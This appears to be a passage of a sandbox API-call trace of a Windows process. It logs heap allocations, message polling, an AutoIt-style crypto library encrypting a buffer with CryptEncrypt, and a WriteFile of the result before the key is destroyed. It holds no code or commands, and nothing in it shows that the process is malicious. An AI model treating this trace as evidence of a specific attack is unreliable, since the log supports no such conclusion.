[0130.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0130.605] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0130.605] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0130.605] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0130.605] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0130.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0130.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.606] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.606] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.606] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0130.606] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.606] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.606] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.607] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0130.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.607] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x823f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x8240) returned 1 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.607] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] CharLowerBuffW (in: lpsz="byte[33345]", cchLength=0xb | out: lpsz="byte[33345]") returned 0xb [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.608] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0130.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb4b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.608] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c26e8*, pdwDataLen=0x144e538*=0x823f, dwBufLen=0x8240 | out: pbData=0x49c26e8*, pdwDataLen=0x144e538*=0x8240) returned 1 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.608] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.608] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.609] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.609] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.609] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.609] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.609] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.609] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x8240, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x8240, lpOverlapped=0x0) returned 1 [0130.611] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.611] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.611] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0130.611] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.611] PeekMessageW (in: lpMsg=0x144e714, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e714) returned 0 [0130.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caf40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0130.611] CryptDestroyKey (hKey=0x41ac700) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.612] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.613] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0130.613] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.613] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.613] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0130.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0130.613] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0130.614] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.614] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0130.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.614] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0130.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.615] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0130.615] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.615] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 